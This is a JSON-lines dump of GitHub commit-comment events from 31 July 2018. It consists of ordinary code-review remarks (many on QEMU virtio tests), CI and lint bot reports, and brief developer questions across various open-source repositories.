{"id":"8043493492","type":"CommitCommentEvent","actor":{"login":"ValYouW"},"repo":{"name":"ValYouW/ml-ocr-tool"},"payload":{"comment":{"id":29902469,"position":null,"line":null,"path":null,"commit_id":"e633b107b79c43e10450f8c797775ba67547591f","created_at":"2018-07-31T11:37:01Z","updated_at":"2018-07-31T11:37:01Z","author_association":"OWNER","body":"@mblacanin Hi, this was part of the \"Machine Learning\" course at [coursera](https://www.coursera.org/learn/machine-learning) and \"oneVsAll.m\" was an homework assignment..."}},"created_at":"2018-07-31T11:37:01Z"}
{"id":"8043494028","type":"CommitCommentEvent","actor":{"login":"keithmancuso"},"repo":{"name":"craftcms/element-api"},"payload":{"comment":{"id":29902470,"position":5,"line":6,"path":"CHANGELOG.md","commit_id":"8b4960890fb8d0fc9e7d0e53b583dca38461a387","created_at":"2018-07-31T11:37:08Z","updated_at":"2018-07-31T11:37:08Z","author_association":"NONE","body":"Don’t you mean enabled, not disabled?"}},"created_at":"2018-07-31T11:37:08Z"}
{"id":"8043494470","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902473,"position":33,"line":33,"path":"tests/libqos/virtio-balloon.h","commit_id":"826b128f0ee00cc24c53bf972ed878397b05c4c3","created_at":"2018-07-31T11:37:13Z","updated_at":"2018-07-31T11:37:13Z","author_association":"NONE","body":"I would remove the \"_if\" from the field name (again, this applies everywhere)."}},"created_at":"2018-07-31T11:37:13Z"}
{"id":"8043497802","type":"CommitCommentEvent","actor":{"login":"Cdaoustd"},"repo":{"name":"cloudops/cca-website"},"payload":{"comment":{"id":29902491,"position":2,"line":1,"path":"themes/cca-general/layouts/partials/homepage/intro-card.html","commit_id":"a30c6283c3a0bbb9531b9b5e52d4a3cfd38079f6","created_at":"2018-07-31T11:37:57Z","updated_at":"2018-07-31T11:37:57Z","author_association":"COLLABORATOR","body":"Hi Khosrow,\n\nThank you so much for your feedback :D\n\nI will definitly check on the forgotten file! How did you notice it so\neasily?\n\nWould you mind explaining to me what you mean by PR and “extra noise”? I\nthink you are refering to the way I’m using github, but am unclear what the\nexpectations are. This is my very first big project so I have never had to\nuse that program before. I am available to talk all day by chat or on a\ncall if it’s too difficult to explain by email and I would very much\nappreciate your help\n\nLooking foward to working with you,\nHave a nice day,\n\nCarine\n\nOn Mon, Jul 30, 2018 at 9:40 PM Khosrow Moossavi <notifications@github.com>\nwrote:\n\n> but anyway the new landing page looks really awesome! 👍\n>\n> —\n> You are receiving this because you authored the thread.\n>\n>\n> Reply to this email directly, view it on GitHub\n> <https://github.com/cloudops/cca-website/commit/a30c6283c3a0bbb9531b9b5e52d4a3cfd38079f6#commitcomment-29896633>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Aj2Rzact9rT5b_TjmmGubCzulYH8c-z2ks5uL7VxgaJpZM4VndkW>\n> .\n>\n"}},"created_at":"2018-07-31T11:37:57Z"}
{"id":"8043497949","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29902492,"position":null,"line":null,"path":null,"commit_id":"ebac71b706a928e64eeae5bdc29fc8445a9c3616","created_at":"2018-07-31T11:37:59Z","updated_at":"2018-07-31T11:37:59Z","author_association":"COLLABORATOR","body":"Puzzle `1099-6ff2eb5a` discovered in   [`src/test/resources/com/zerocracy/bundles/refresh_person_job_count_on_agenda_update/_after.groovy`](  https://github.com/zerocracy/farm/blob/master/src/test/resources/com/zerocracy/bundles/refresh_person_job_count_on_agenda_update/_after.groovy)   and submitted as #1513. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-31T11:37:59Z"}
{"id":"8043498767","type":"CommitCommentEvent","actor":{"login":"osjava25"},"repo":{"name":"osjava25/sismos"},"payload":{"comment":{"id":29902495,"position":null,"line":null,"path":null,"commit_id":"7fa3de16b69256454d8ed770197d8304e5b87347","created_at":"2018-07-31T11:38:11Z","updated_at":"2018-07-31T11:38:11Z","author_association":"OWNER","body":"prueba"}},"created_at":"2018-07-31T11:38:11Z"}
{"id":"8043499585","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902501,"position":4,"line":775,"path":"tests/Makefile.include","commit_id":"3140ac9feaa28188bb2176ec15ee2536afb35ef9","created_at":"2018-07-31T11:38:20Z","updated_at":"2018-07-31T11:38:20Z","author_association":"OWNER","body":"because target `libqos-virtio-obj-y` already includes them, so I thought maybe I can avoid such repetitions"}},"created_at":"2018-07-31T11:38:20Z"}
{"id":"8043503062","type":"CommitCommentEvent","actor":{"login":"sroughley"},"repo":{"name":"rdkit/knime-rdkit"},"payload":{"comment":{"id":29902512,"position":null,"line":null,"path":null,"commit_id":"4cd2d335f2c79f5d7f4791c12c6535d48b232ce9","created_at":"2018-07-31T11:39:07Z","updated_at":"2018-07-31T11:39:07Z","author_association":"NONE","body":"Yup - it's a pain.  There is a method of forcing the version number down from the feature, _but I've never tried it_ (DISCLAIMER Alert!)...  In the feature.xml editor in Eclipse, on the `Included Plugins` tab, if you click on the `Versions...` button, then you get the following dialog:\r\n\r\n![image](https://user-images.githubusercontent.com/8321832/43457294-503323bc-94be-11e8-8af1-32321882f765.png)\r\n\r\nIf you select the final option (Force feature version into....) it _should_ stop you needing to make all the separate changes.  Did I mention I've never actually selected that option?!\r\n\r\nSteve"}},"created_at":"2018-07-31T11:39:07Z"}
{"id":"8043504825","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29902520,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-31T11:39:31Z","updated_at":"2018-07-31T11:39:31Z","author_association":"COLLABORATOR","body":"... and my problem is that I trusted GCC 8 blindly and pushed bogus changes 👎 "}},"created_at":"2018-07-31T11:39:31Z"}
{"id":"8043507701","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902529,"position":26,"line":26,"path":"tests/virtio-rng-test.c","commit_id":"af35e956ba2a877f4593d9e2e8a883512df5728c","created_at":"2018-07-31T11:40:10Z","updated_at":"2018-07-31T11:40:10Z","author_association":"NONE","body":"Hmm, why are you removing the \"if\"? I don't understand, this part of the test is still x86-specific and not qgraph-ified."}},"created_at":"2018-07-31T11:40:10Z"}
{"id":"8043511807","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902535,"position":733,"line":648,"path":"tests/virtio-blk-test.c","commit_id":"44ea60b2c30f07f19365493aac855eed795fd626","created_at":"2018-07-31T11:41:01Z","updated_at":"2018-07-31T11:41:01Z","author_association":"NONE","body":"-100 lines is not bad. :)"}},"created_at":"2018-07-31T11:41:01Z"}
{"id":"8043512274","type":"CommitCommentEvent","actor":{"login":"mrdougquaid"},"repo":{"name":"xbmc-adult/xbmc-adult"},"payload":{"comment":{"id":29902536,"position":null,"line":null,"path":null,"commit_id":"6be51362eff283e7a3dd0f00bb07cdd41f555dc1","created_at":"2018-07-31T11:41:08Z","updated_at":"2018-07-31T11:41:08Z","author_association":"CONTRIBUTOR","body":"Replaced tabs with spaces"}},"created_at":"2018-07-31T11:41:08Z"}
{"id":"8043513226","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902538,"position":33,"line":28,"path":"tests/virtio-console-test.c","commit_id":"6433845f40c5561900d3c8a0560563d224f4eeb3","created_at":"2018-07-31T11:41:19Z","updated_at":"2018-07-31T11:41:19Z","author_association":"OWNER","body":"yes, they are. I allocate because otherwise I need to set to NULL all the other fields. \r\n`eopts` should be edge options. Look at qgraph.h (first commit) for what I did, I think it needs to be modified. \r\nI also was thinking to change _before and _after with other clearer names, not sure about which"}},"created_at":"2018-07-31T11:41:19Z"}
{"id":"8043518432","type":"CommitCommentEvent","actor":{"login":"peterbell10"},"repo":{"name":"cuberite/cuberite"},"payload":{"comment":{"id":29902549,"position":10,"line":104,"path":"Tools/ProtoProxy/CMakeLists.txt","commit_id":"757231cc6e777b8f4717d1467ef7efa01c7fde15","created_at":"2018-07-31T11:42:30Z","updated_at":"2018-07-31T11:42:30Z","author_association":"MEMBER","body":"The only way it works currently to invoke cmake with the top level cuberite directory and `-DBUILD_TOOLS=1`.\r\nSee the discussion in  #4131."}},"created_at":"2018-07-31T11:42:30Z"}
{"id":"8043522076","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902563,"position":154,"line":154,"path":"tests/libqos/virtio-9p.c","commit_id":"bf0f401549b261df82014779f9664ff7003d313b","created_at":"2018-07-31T11:43:19Z","updated_at":"2018-07-31T11:43:19Z","author_association":"OWNER","body":"unfortunately yes, in virtio-scsi.c I have to put one of the drivers or disk after the device, because in that case order matters. But I agree, before and after are not good names."}},"created_at":"2018-07-31T11:43:19Z"}
{"id":"8043523251","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/otrv4-prekey-server"},"payload":{"comment":{"id":29902564,"position":21,"line":400,"path":"otrv4-prekey-server.md","commit_id":"c820dba201556f252c2252549d417bacb5711cc9","created_at":"2018-07-31T11:43:34Z","updated_at":"2018-07-31T11:43:34Z","author_association":"MEMBER","body":"This is probably 'encode'. I'll change it :)"}},"created_at":"2018-07-31T11:43:34Z"}
{"id":"8043528132","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902578,"position":4,"line":775,"path":"tests/Makefile.include","commit_id":"3140ac9feaa28188bb2176ec15ee2536afb35ef9","created_at":"2018-07-31T11:44:38Z","updated_at":"2018-07-31T11:44:38Z","author_association":"NONE","body":"Ah ok. The alternative is to remove them from libqos-virtio-obj-y."}},"created_at":"2018-07-31T11:44:38Z"}
{"id":"8043531924","type":"CommitCommentEvent","actor":{"login":"xorhash"},"repo":{"name":"Marenthyu/NepBot"},"payload":{"comment":{"id":29902590,"position":null,"line":null,"path":null,"commit_id":"69281c87b7e64a27615589592ccb55a05588f5e9","created_at":"2018-07-31T11:45:27Z","updated_at":"2018-07-31T11:45:27Z","author_association":"NONE","body":"\"with the new curve\"\r\n\r\nYou just undid the new curve here, is this intentional?"}},"created_at":"2018-07-31T11:45:27Z"}
{"id":"8043532663","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902592,"position":128,"line":128,"path":"tests/libqos/virtio-balloon.c","commit_id":"826b128f0ee00cc24c53bf972ed878397b05c4c3","created_at":"2018-07-31T11:45:37Z","updated_at":"2018-07-31T11:45:37Z","author_association":"OWNER","body":"why separate file? virtio-balloon-ccw (and in general, virtio-xxx-ccw) should be with the other virtio-xxx no? Like I do with -device and -pci. I added the todo everywhere as I made for sdhci.c, when we commented the remaining machines models."}},"created_at":"2018-07-31T11:45:37Z"}
{"id":"8043533225","type":"CommitCommentEvent","actor":{"login":"hwxhwxhwxhwx"},"repo":{"name":"hwxhwxhwxhwx/alien_invasion"},"payload":{"comment":{"id":29902596,"position":null,"line":null,"path":null,"commit_id":"707649c94da1831b7c7cd8576725f54c7dbb5934","created_at":"2018-07-31T11:45:45Z","updated_at":"2018-07-31T11:45:45Z","author_association":"OWNER","body":"第二次修改。"}},"created_at":"2018-07-31T11:45:45Z"}
{"id":"8043533833","type":"CommitCommentEvent","actor":{"login":"reckez"},"repo":{"name":"boraikizoglu/Anonify"},"payload":{"comment":{"id":29902599,"position":null,"line":null,"path":null,"commit_id":"544d17af770e739e6ea79197f62104cd048d5284","created_at":"2018-07-31T11:45:54Z","updated_at":"2018-07-31T11:45:54Z","author_association":"NONE","body":"Hi, how to I import this project in android studio and modify it? what database do I need to get it up and running? Thank you"}},"created_at":"2018-07-31T11:45:54Z"}
{"id":"8043534122","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902601,"position":33,"line":33,"path":"tests/libqos/virtio-balloon.h","commit_id":"826b128f0ee00cc24c53bf972ed878397b05c4c3","created_at":"2018-07-31T11:45:58Z","updated_at":"2018-07-31T11:45:58Z","author_association":"OWNER","body":"Ok, I added it to mean \"interface\""}},"created_at":"2018-07-31T11:45:58Z"}
{"id":"8043540111","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29902612,"position":null,"line":null,"path":null,"commit_id":"a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77","created_at":"2018-07-31T11:47:15Z","updated_at":"2018-07-31T11:47:15Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - i386-Windows-7-VisualStudio-14: OK (2964 of 2964 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a3a7ce50921f9276dc5047cae9cbc0f32c1f6f77-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T11:47:15Z"}
{"id":"8043540524","type":"CommitCommentEvent","actor":{"login":"Dabomstew"},"repo":{"name":"Marenthyu/NepBot"},"payload":{"comment":{"id":29902613,"position":null,"line":null,"path":null,"commit_id":"69281c87b7e64a27615589592ccb55a05588f5e9","created_at":"2018-07-31T11:47:20Z","updated_at":"2018-07-31T11:47:20Z","author_association":"COLLABORATOR","body":"Yeah, I first thought changing it to a quadratic would work, but then looked at some of the output and didn't like what it did to certain parts, so changed it to buffing first place instead."}},"created_at":"2018-07-31T11:47:20Z"}
{"id":"8043540805","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"hbc/bcbioSingleCell"},"payload":{"comment":{"id":29902615,"position":null,"line":null,"path":null,"commit_id":"6c738721053d4d6faa703997782cf2517a3f0db8","created_at":"2018-07-31T11:47:24Z","updated_at":"2018-07-31T11:47:24Z","author_association":"NONE","body":"[R/counts-internal.R:1:1:](https://github.com/hbc/bcbioSingleCell/blob/6c738721053d4d6faa703997782cf2517a3f0db8/R/counts-internal.R#L1) *style:* **TODO comments should be removed.**\n```r\n​# TODO Simplify the bcbio method, using the combined MatrixMarket file\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/diffExp-methods.R:1:1:](https://github.com/hbc/bcbioSingleCell/blob/6c738721053d4d6faa703997782cf2517a3f0db8/R/diffExp-methods.R#L1) *style:* **TODO comments should be removed.**\n```r\n​# TODO Rethink this approach...we want to run zinbwave once on the whole\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/filterCells-methods.R:16:1:](https://github.com/hbc/bcbioSingleCell/blob/6c738721053d4d6faa703997782cf2517a3f0db8/R/filterCells-methods.R#L16) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param minUMIs `scalar integer`. Minimum number of UMI disambiguated counts per cell.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/filterCells-methods.R:17:1:](https://github.com/hbc/bcbioSingleCell/blob/6c738721053d4d6faa703997782cf2517a3f0db8/R/filterCells-methods.R#L17) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param maxUMIs `scalar integer`. Maximum number of UMI disambiguated counts per cell.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/updateObject-methods.R:1:1:](https://github.com/hbc/bcbioSingleCell/blob/6c738721053d4d6faa703997782cf2517a3f0db8/R/updateObject-methods.R#L1) *style:* **TODO comments should be removed.**\n```r\n​# TODO Provide support for adding sample-level metadata in long format back\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-31T11:47:24Z"}
{"id":"8043540811","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902616,"position":33,"line":28,"path":"tests/virtio-console-test.c","commit_id":"6433845f40c5561900d3c8a0560563d224f4eeb3","created_at":"2018-07-31T11:47:24Z","updated_at":"2018-07-31T11:47:24Z","author_association":"NONE","body":"I would rename \"eopts\" to \"edge\". If you use designated initializers as above, all the fields you don't specify are initialized to zero (interesting fact of the day about C), so you don't need the new/free."}},"created_at":"2018-07-31T11:47:24Z"}
{"id":"8043540938","type":"CommitCommentEvent","actor":{"login":"carandraug"},"repo":{"name":"carandraug/Pyro4"},"payload":{"comment":{"id":29902617,"position":null,"line":null,"path":null,"commit_id":"63902b87435129b636cf7bf0e9b4ea3623263dec","created_at":"2018-07-31T11:47:26Z","updated_at":"2018-07-31T11:47:26Z","author_association":"OWNER","body":"It was kind of on purpose. I didn't thought about its name being core, I just thought it should go in the same module that defines the `Daemon` class. But I will put it whatever you think is the right place."}},"created_at":"2018-07-31T11:47:26Z"}
{"id":"8043543551","type":"CommitCommentEvent","actor":{"login":"Senui"},"repo":{"name":"BioDynaMo/biodynamo"},"payload":{"comment":{"id":29902631,"position":null,"line":null,"path":null,"commit_id":"0fbdd3f8886db75ba8bab31eee265fcc51542ae6","created_at":"2018-07-31T11:48:00Z","updated_at":"2018-07-31T11:48:00Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refactor ParaView code](https://trello.com/c/PHBnjzNY/194-refactor-paraview-code)"}},"created_at":"2018-07-31T11:48:00Z"}
{"id":"8043547577","type":"CommitCommentEvent","actor":{"login":"eguendelman"},"repo":{"name":"felixfrank/flatbuffers"},"payload":{"comment":{"id":29902636,"position":25,"line":455,"path":"python/flatbuffers/builder.py","commit_id":"ef94e2410dd0155b52574deb6a577c8c73e92075","created_at":"2018-07-31T11:48:53Z","updated_at":"2018-07-31T11:48:53Z","author_association":"NONE","body":"I think this should be `x.ndim` instead of `x.data.ndim`? (I'm on numpy 1.15.0)"}},"created_at":"2018-07-31T11:48:53Z"}
{"id":"8043550392","type":"CommitCommentEvent","actor":{"login":"stibanez"},"repo":{"name":"stibanez/healthrecords-softdev"},"payload":{"comment":{"id":29902644,"position":null,"line":null,"path":null,"commit_id":"3979b6d383657af71c992a774d6eb2e50aa80ee6","created_at":"2018-07-31T11:49:31Z","updated_at":"2018-07-31T11:49:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Register Person](https://trello.com/c/16rHs1AP/10-register-person)"}},"created_at":"2018-07-31T11:49:31Z"}
{"id":"8043551201","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902652,"position":60,"line":60,"path":"tests/libqos/virtio-balloon.c","commit_id":"826b128f0ee00cc24c53bf972ed878397b05c4c3","created_at":"2018-07-31T11:49:42Z","updated_at":"2018-07-31T11:49:42Z","author_association":"OWNER","body":"Makes much more sense :+1: "}},"created_at":"2018-07-31T11:49:42Z"}
{"id":"8043557694","type":"CommitCommentEvent","actor":{"login":"juniorz"},"repo":{"name":"otrv4/otrng-prekey-server"},"payload":{"comment":{"id":29902669,"position":null,"line":null,"path":null,"commit_id":"e89231bb6ddadad27c3b90be2086b5ba98ebd707","created_at":"2018-07-31T11:51:06Z","updated_at":"2018-07-31T11:51:06Z","author_association":"MEMBER","body":"After updating `libotr-ng` to allow a configurable `usage_auth` (https://github.com/otrv4/libotr-ng/commit/d573f62a3c54f2e19646d08bd81d87575920002c) I still can't verify a ring signature generated on golang with `usage_auth = 0x11` (https://github.com/otrv4/libotr-ng/commit/780e5cad1b685472e485dc5ccaa5adefce7d9846)."}},"created_at":"2018-07-31T11:51:06Z"}
{"id":"8043559050","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902672,"position":26,"line":26,"path":"tests/virtio-rng-test.c","commit_id":"af35e956ba2a877f4593d9e2e8a883512df5728c","created_at":"2018-07-31T11:51:23Z","updated_at":"2018-07-31T11:51:23Z","author_association":"OWNER","body":"it still works for ppc64, so I thought it was fine to delete it. Otherwise it will eventually need to be ported anyway, no?"}},"created_at":"2018-07-31T11:51:23Z"}
{"id":"8043565647","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902686,"position":128,"line":128,"path":"tests/libqos/virtio-balloon.c","commit_id":"826b128f0ee00cc24c53bf972ed878397b05c4c3","created_at":"2018-07-31T11:52:51Z","updated_at":"2018-07-31T11:52:51Z","author_association":"NONE","body":"You're right about not having the separate file. The s390 case is a bit weird because it can only run nop tests. I would remove it anyway. I'll send you a patch to put at the beginning to remove s390 from libqos."}},"created_at":"2018-07-31T11:52:51Z"}
{"id":"8043565769","type":"CommitCommentEvent","actor":{"login":"yoghaprs"},"repo":{"name":"sajjadjaved01/iptv"},"payload":{"comment":{"id":29902688,"position":null,"line":null,"path":null,"commit_id":"6b8d66bcb8439c6920cff2e7488b049150621799","created_at":"2018-07-31T11:52:53Z","updated_at":"2018-07-31T11:52:53Z","author_association":"NONE","body":"search bar not working"}},"created_at":"2018-07-31T11:52:53Z"}
{"id":"8043567223","type":"CommitCommentEvent","actor":{"login":"RRRoger"},"repo":{"name":"RRRoger/FirstProject"},"payload":{"comment":{"id":29902690,"position":47,"line":47,"path":"other_tools/date_tools.py","commit_id":"48e518d825b5f0ee280c41d37a15308b3459ed9f","created_at":"2018-07-31T11:53:12Z","updated_at":"2018-07-31T11:53:12Z","author_association":"OWNER","body":"test comment"}},"created_at":"2018-07-31T11:53:12Z"}
{"id":"8043568791","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29902692,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-31T11:53:32Z","updated_at":"2018-07-31T11:53:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T11:53:32Z"}
{"id":"8043575736","type":"CommitCommentEvent","actor":{"login":"chanyeung"},"repo":{"name":"chanyeung/cern"},"payload":{"comment":{"id":29902713,"position":null,"line":null,"path":null,"commit_id":"465e6542261e2ac6ffd3cc3b00fcdb476824b87d","created_at":"2018-07-31T11:55:05Z","updated_at":"2018-07-31T11:55:05Z","author_association":"OWNER","body":"change"}},"created_at":"2018-07-31T11:55:05Z"}
{"id":"8043577515","type":"CommitCommentEvent","actor":{"login":"chihaoyo"},"repo":{"name":"watchout-tw/watchout-common-assets"},"payload":{"comment":{"id":29902715,"position":null,"line":null,"path":null,"commit_id":"fa42c724128d4236c2d8293ff5c934a0e050f8c4","created_at":"2018-07-31T11:55:28Z","updated_at":"2018-07-31T11:55:28Z","author_association":"CONTRIBUTOR","body":"This is not necessary. Use `.form-field-many-inputs` at parent element."}},"created_at":"2018-07-31T11:55:28Z"}
{"id":"8043581987","type":"CommitCommentEvent","actor":{"login":"ShandyGaffLover"},"repo":{"name":"ShandyGaffLover/training"},"payload":{"comment":{"id":29902731,"position":null,"line":null,"path":null,"commit_id":"be742402a0dad90f9de2a03a4747cd113ee24088","created_at":"2018-07-31T11:56:23Z","updated_at":"2018-07-31T11:56:23Z","author_association":"OWNER","body":"練習問題 - プログラミングスレまとめ in VIP\r\nhttp://vipprog.net/wiki/exercise.html#o8db2119\r\nにあった「素数判定」の問題に回答。\r\nただしこのコードだと\r\n巨大な素数の一覧 - Wikipedia\r\nhttps://ja.wikipedia.org/wiki/%E5%B7%A8%E5%A4%A7%E3%81%AA%E7%B4%A0%E6%95%B0%E3%81%AE%E4%B8%80%E8%A6%A7\r\nにある数字の2,147,483,647あたりで処理に時間がかかりすぎる"}},"created_at":"2018-07-31T11:56:23Z"}
{"id":"8043584392","type":"CommitCommentEvent","actor":{"login":"carandraug"},"repo":{"name":"carandraug/Pyro4"},"payload":{"comment":{"id":29902734,"position":28,"line":2079,"path":"src/Pyro4/core.py","commit_id":"63902b87435129b636cf7bf0e9b4ea3623263dec","created_at":"2018-07-31T11:56:51Z","updated_at":"2018-07-31T11:56:51Z","author_association":"OWNER","body":"`__import__` is meant to be used by the Python interpreter and not for general use.  There is `importlib.import_module()` but that is to import modules not scripts in arbitrary locations. I couldn't figure out how to make it import scripts with the same name as installed packages without modifying `sys.path`. The same for a script in some other directory."}},"created_at":"2018-07-31T11:56:51Z"}
{"id":"8043586246","type":"CommitCommentEvent","actor":{"login":"chanyeung"},"repo":{"name":"chanyeung/cern"},"payload":{"comment":{"id":29902739,"position":null,"line":null,"path":null,"commit_id":"465e6542261e2ac6ffd3cc3b00fcdb476824b87d","created_at":"2018-07-31T11:57:14Z","updated_at":"2018-07-31T11:57:14Z","author_association":"OWNER","body":"뭐야뭐야 ㅜㅜ"}},"created_at":"2018-07-31T11:57:14Z"}
{"id":"8043587344","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng"},"payload":{"comment":{"id":29902743,"position":5,"line":31,"path":"src/auth.h","commit_id":"d573f62a3c54f2e19646d08bd81d87575920002c","created_at":"2018-07-31T11:57:27Z","updated_at":"2018-07-31T11:57:27Z","author_association":"MEMBER","body":"Yeah.. it should be '0x1C'."}},"created_at":"2018-07-31T11:57:27Z"}
{"id":"8043588532","type":"CommitCommentEvent","actor":{"login":"Facimus"},"repo":{"name":"Apress/pro-asp.net-core-mvc-2"},"payload":{"comment":{"id":29902748,"position":null,"line":null,"path":null,"commit_id":"281b856fd83a03491dddc1cae224f2aedcd32731","created_at":"2018-07-31T11:57:41Z","updated_at":"2018-07-31T11:57:41Z","author_association":"NONE","body":"On page 22, the book says choose MVC View page but , after vs 2017 version 15.6 there is no such a choice in the Add new item window. One must choose Razor view instead (The content are the same)."}},"created_at":"2018-07-31T11:57:41Z"}
{"id":"8043592626","type":"CommitCommentEvent","actor":{"login":"shubhamchitre24121996"},"repo":{"name":"shubhamchitre24121996/OMNIFOOD-REAL"},"payload":{"comment":{"id":29902761,"position":null,"line":null,"path":null,"commit_id":"d8b5ce31533cce79fb9c07b4b88083cba790fd13","created_at":"2018-07-31T11:58:30Z","updated_at":"2018-07-31T11:58:30Z","author_association":"OWNER","body":"cite element added and build customer testimony!"}},"created_at":"2018-07-31T11:58:30Z"}
{"id":"8043596155","type":"CommitCommentEvent","actor":{"login":"smichaelsen"},"repo":{"name":"TYPO3/Fluid"},"payload":{"comment":{"id":29902769,"position":69,"line":106,"path":"src/Core/ViewHelper/AbstractConditionViewHelper.php","commit_id":"a67b31f9e6ecb015d0f47892fce46cf64110fd15","created_at":"2018-07-31T11:59:13Z","updated_at":"2018-07-31T11:59:13Z","author_association":"NONE","body":"Which one is the one to override? evaluateCondition() or verdict()? They both share the same comment."}},"created_at":"2018-07-31T11:59:13Z"}
{"id":"8043597985","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29902779,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-31T11:59:34Z","updated_at":"2018-07-31T11:59:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T11:59:34Z"}
